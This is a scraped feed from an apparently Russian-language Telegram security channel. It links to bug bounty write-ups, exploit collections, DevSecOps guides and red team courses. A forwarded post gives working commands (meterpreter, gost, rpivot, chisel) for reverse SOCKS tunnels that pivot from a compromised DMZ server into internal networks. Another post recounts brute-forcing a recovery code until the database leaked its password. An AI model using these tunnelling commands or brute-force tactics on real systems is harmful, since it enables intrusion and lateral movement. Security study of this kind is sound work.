#Beacon
@w3b_pwn
1.18K subscribers
271 photos
26 videos
130 files
1.83K links
Прожаренный цуберпохек

[educational channel/white hat only] - do not try the knowledge from here on your home or other people's microwaves
Download Telegram
About
Blog
Apps
Platform
Join
#Beacon
1.18K subscribers
#Beacon
Steam XSS $7,500 | Bug bounty 2018
https://www.youtube.com/watch?v=aybCeXhEjsA
YouTube
Steam XSS $7,500 | Bug bounty 2018
xss
by zemnmez

For contact :-
https://www.instagram.com/gaurrravluthra/
365 views
#Beacon
https://github.com/GhostTroops/TOP
GitHub
GitHub - GhostTroops/TOP: TOP All bugbounty pentesting CVE-2023- POC Exp RCE example payload Things
TOP All bugbounty pentesting CVE-2023- POC Exp RCE example payload Things - GhostTroops/TOP
325 views
#Beacon
#Beacon
https://github.com/GhostTroops/TOP
https://redteamrecipe.com/top-50-vulnerabilities-leading-to-rce-in-public-facing-applicationsrtc0016
RedTeamRecipe
Top 50 Vulnerabilities Leading to RCE in Public-Facing Applications
Vulnerability NameCVE IDHint



Log4Shell Vulnerability in Log4jCVE-2021-44228Link

ProxyLogon Vulnerability in Microsoft Exchange ServerCVE-2021-26855Link

BlueKeep Vulnerability in Windows RDPCVE-2019-0708Link

TMUI RCE Vulnerability in BIG-IPCVE-2...
408 views
#Beacon
https://hackerone.com/reports/922456
HackerOne
GitLab disclosed on HackerOne: Ability to bypass email verification...
### Summary
There's a limitation that requires a validated email before going through the OAuth flow, however this is bypassable. Bypassing this means the target site assumes your email is...
461 views
#Beacon
The Ultimate Red Team Roadmap | from indus
https://www.youtube.com/watch?v=XvUFd71HljE
YouTube
The Ultimate Red Team Roadmap | اقوى خريطة تعلم فريق الاحمر
هل أنت مهتم بعالم الأمن السيبراني وترغب في التعرف على الاستراتيجيات والتقنيات التي تستخدمها الفرق الحمراء؟ لا تنظر أبعد من أحدث فيديو لدينا! نكشف عن خارطة طريق الفريق الأحمر النهائية، ونوفر لك دليلًا تفصيليًا لبناء مهاراتك والنهوض بحياتك المهنية في مجال الأمن…
536 views
#Beacon
https://samcurry.net/web-hackers-vs-the-auto-industry/
samcurry.net
Web Hackers vs. The Auto Industry: Critical Vulnerabilities in Ferrari, BMW, Rolls Royce, Porsche, and More
While we were visiting the University of Maryland, we came across a fleet of electric scooters scattered across the campus and couldn't resist poking at the scooter's mobile app. To our surprise, our actions caused the horns and headlights on all of the scooters…
450 views
#Beacon
https://youtu.be/_zkxePwnf9A?si=DKPq5HC74dLpIchU
YouTube
[Bug Bounty] $3,000 Instagram delete highlight cover IDOR
Bug found in Instagram
Write-up here: adragos.ro/idor-bug-instagram/
453 views
#Beacon
Материал про пентест 1С
Ardent101
Еще 1 раз про пентест 1С
Введение Настоящий материал по большей части состоит из общедоступных наработок других людей. Целью было проверить указанные наработки на практике и собрать получившиеся результаты в одном месте. Именно этим объясняется название статьи.
Продолжу рассуждение…
420 views
#Beacon
https://www.youtube.com/watch?v=6du4ikeX2bk
YouTube
Hack Smarter LIVE w/ Tyler Ramsbey
Join the Hack Smarter community: https://hacksmarter.org
--- Join me and let's hack stuff together!
379 views
#Beacon
https://youtube.com/playlist?list=PLYq73lsQ7MT0DNBz6LQNtNzl6XT6Eazoc&si=uSjQ5pEQ-uRlEXhm
390 views
#Beacon
Forwarded from RedTeam brazzers
Существует много способов построить reverse socks туннель. Давайте рассмотрим 3 самых простых.
- Meterpreter
Строим сессию meterpreter (пусть она будет под номером 1).
Далее запускаем socks сервер use auxiliary/server/socks_proxy и прописываем route в сессию метерпретер:
route add 192.168.0.0 255.255.0.0 1
Всё, теперь залетая в 127.0.0.1:1080 мы вылетим во внутренней сети(proxychains или tsocks кому как удобнее).
Возможно кто нибудь из олдов скажет, что этот способ плохой и будь мы в 2020 году - я бы согласился, тогда модуль назывался auxiliary/server/socks4a и работал он из рук вон плохо, но времена меняются.
- reGeorg
Используем инструмент https://github.com/sensepost/reGeorg. Если вы проломили сервер в DMZ, то скорее всего там есть PHP, ASP или JSP приложение. Стоит загрузить соответствующий файл на сервер, запустить у себя клиент - и вот мы через HTTP туннель вылетаем во внутреннюю сеть.
- Gost
Способ которым пользуюсь я сам. Невероятно мощный инструмент https://github.com/ginuerzh/gost, на узле В запускаем gost в интернете:
gost -L socks5://user:pass@0.0.0.0:1337
На узле А запускаем 2 госта:
./gost -L socks5://user:pass@127.0.0.1:13338&
./gost -L rtcp://0.0.0.0:13381/127.0.0.1:13338 -F socks5://user:pass@<ip B>:1337&
всё, теперь подключаемся к порту 13381 на узле D и выходим в DMZ. Как бонус мы установили логин/пароль на socks и повесили порт на сервере B в Интернет.
Инструмент gost очень надёжный и построив один раз туннель можете не переживать, он и через месяц будет работать, как говорится "без единого разрыва!".
Есть и другие инструменты, в том числе и встроенные, например, ssh. Первым шагом на сервер B пробрасываем 22 порт, а потом на сервере B подключаемся в него с опцией -D, но этот способ может быть не всегда удобен.

Есть прекрасная статья https://posts.specterops.io/offensive-security-guide-to-ssh-tunnels-and-proxies-b525cbd4d4c6 которая вам подробнее расскажет про магию SSH.
Еще есть вариант с помощью инструмента Rpivot(https://github.com/klsecservices/rpivot):
python server.py --proxy-port 1080 --server-port 9999 --server-ip 0.0.0.0

Client side:

python client.py --server-ip <ip> --server-port 9999

As a result, a socks4 proxy service will be bound server side on port 1080.

Еще вариант от уважаемого гостя нашего канала (@snovvcrash)
Используя chisel:

(B) $ ./chisel server -p 1337 --reverse --socks5 --auth hax0r:'Passw0rd!'
(A) $ nohup ./chisel client --fingerprint <FINGERPRINT> --auth hax0r:'Passw0rd!' 8.8.8.8:1337 R:127.0.0.1:1080:socks &
(B) $ proxychains4 -q hacktheplanet.py 10.10.13.37

где 10.10.13.37 - какая-нибудь тачка из внутренней сети
Верно ответили на вопрос:
@Lizzmack
@heart1ess
@drakylar
@snovvcrash
#вопросответ
GitHub
GitHub - sensepost/reGeorg: The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and…
The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn. - sensepost/reGeorg
376 views
#Beacon
https://github.com/analysis-tools-dev/static-analysis?tab=readme-ov-file
GitHub
GitHub - analysis-tools-dev/static-analysis: ⚙️ A curated list of static analysis (SAST) tools and linters for all programming…
⚙️ A curated list of static analysis (SAST) tools and linters for all programming languages, config files, build tools, and more. The focus is on tools which improve code quality. - analysis-tools-...
338 views
#Beacon
https://telegra.ph/Bug-Bounty-kotoroj-net-09-08
Telegraph
Bug Bounty, которой нет
Заказывая очередную вещь на маркетплейсе Wildberries, увидел в футере страницы кликабельную ссылку со знакомым мне текстом “Bug Bounty”. Пройти мимо этой ссылки я не мог, и, отложив оплату своего заказа на потом, сразу побежал читать условия “Программы поиска…
391 views
#Beacon
Forwarded from Заметки Bug Bounty Hunter'а
Искал медь, а нашёл золото

Решил проверить наличие защиты от перебора кода при восстановлении доступа к аккаунту. Код восстановления состоял из 4 символов. Взял фаззер, по умолчанию выставил 50 одновременных потоков, запустил перебор и не обнаружил никаких rate limit'еров. Время жизни кода было небольшим - всего 60 секунд, а ответ от сервера занимал несколько секунд. При таких условиях времени перебрать все возможные варианты попросту не хватило бы

Выставил 1000 потоков и... забил все доступные слоты для подключения к БД 😬
В результате сервер в теле ответа вернул детали ошибки. В одной из строчек присутствовал пароль от БД в открытом виде 😎

И такое бывает 😁
321 views
#Beacon
https://blog.voorivex.team/20300-bounties-from-a-200-hour-hacking-challenge
Voorivex's Team
$20,300 Bounties from a 200 Hour Hacking Challenge
Back to July 2023, Mohammad Nikouei and I decided to dedicate 100 hours to working on the public BB program on BugCrowd. We worked on the program part-time, spending 4 to 6 hours per day on it each. The program we chose was a famous and big company, ...
363 views
#Beacon
Создал чат группы, живем живем, общаемся

#MakeBeaconGreatAgain

https://t.me/+GjPk9X1ETMlkYzE8
Telegram
#Beacon
#MakeBeaconGreatAgain
Группа: https://t.me/w3b_pwn

Жарим бекончик
388 viewsedited  
#Beacon
Опять кому-то сломали лицо пассворд-спреингом, когда не было 2фа (кому-то это майкрософтам)

https://securityaffairs.com/157802/apt/midnight-blizzard-hacked-microsoft-email-accounts.html
Security Affairs
Russia-linked Midnight Blizzard APT hacked Microsoft corporate emails
Microsoft revealed that the Russia-linked APT Midnight Blizzard has compromised some of its corporate email accounts. 
340 viewsedited  
#Beacon
Начинаем серию статей по DevOps и DevSecOps, где поделимся интересными идеями о DevOps в общем, рассмотрим инструменты, облегчающие процесс разработки кода. Но особое внимание уделим DevSecOps и особенностям обеспечения безопасности в разработке.👨‍💻

Основы😄:

-Зачем вообще внедрять девопс если все это дорого богато, а штрафы за утечки в РФ стоят копейки(там не сильно интересно, но в целом базу зачем надо описывают)
https://youtube.com/watch?v=ywu7osKVZIw&feature=youtu.be

- Позитивы на стендофе, от лозунгов к реализации devsecops
https://youtu.be/BF24NoqU5ZI?si=sEK1JW5lGHLU7W5m

- Мифический человеко-DevOps
https://habr.com/ru/articles/786854/

- Некоторые техники безопасной разработки https://www.chaossearch.io/blog/advanced-devsecops-techniques-audit-logging

- Строим devsecops pipeline на опенсурс инструментах
https://medium.com/@ikbenezer/building-a-devsecops-pipeline-with-open-source-tools-c296b88cf22c

- Архитектура цикла безопасной разработки здорового человека от microsoft https://learn.microsoft.com/ru-ru/azure/architecture/solution-ideas/articles/devsecops-rolling-branch

- Advanced End-to-End DevSecOps Kubernetes(может понадобиться впн, т.к. medium) https://blog.stackademic.com/advanced-end-to-end-devsecops-kubernetes-three-tier-project-using-aws-eks-argocd-prometheus-fbbfdb956d1a

- Инструменты devsecops, постоянно пополяемый список различных инструментов, заглядываю туда когда надо подобрать нужный инструмент
https://github.com/sottlmarek/DevSecOps

Как все происходит, если не соблюдать🤒:
- Как через Github крупные компании ломают, основные приемы https://securitymedia.org/info/opasnye-svyazi-kak-prestupniki-vzlamyvayut-it-produkty-cherez-github.html

- Почему Rockstar Games и Uber взломаны несмотря на девопс https://www.informationweek.com/software-services/is-it-time-to-rethink-devsecops-after-major-security-breaches-

Интересные канальчики🤠:
https://t.me/devsecops_weekly
https://devops.com/category/blogs/devsecops/

Постинг по данной теме можно будет найти по хештегу
#devsecops

Список будет постоянно пополняться
👍1
385 viewsedited  
#Beacon
Строим devsecops pipeline на к‌о‌л‌е‌н‌к‌е‌ opensource тулзах

https://medium.com/@ikbenezer/building-a-devsecops-pipeline-with-open-source-tools-c296b88cf22c


Ссылка для РФ без впн:
https://freedium.cfd/https://medium.com/@ikbenezer/building-a-devsecops-pipeline-with-open-source-tools-c296b88cf22c


#devsecops
Medium
Building a DevSecOps Pipeline with Open-Source Tools
A tutorial on how to build a DevSecOps pipeline with open-source tools.
357 viewsedited  
#Beacon
Кстати довольно таки интересный курс по похеку(взлому) active directory, там все основы, также в конце дают сертификат о прохождении лекций.
Несмотря на то что работодатели не ценят прохождение курсиков udemy - для галочки и знаний нормально

https://www.udemy.com/course/active-directory-exploitation-and-lateral-movement-black-box/

#Redteam
Udemy
Active Directory Exploitation and Lateral Movement BlackBox
Exploiting Kerberos Delegations, Forest Trusts, SQL Server, ACLs, Excessive Users and Groups privilege and Many more
421 viewsedited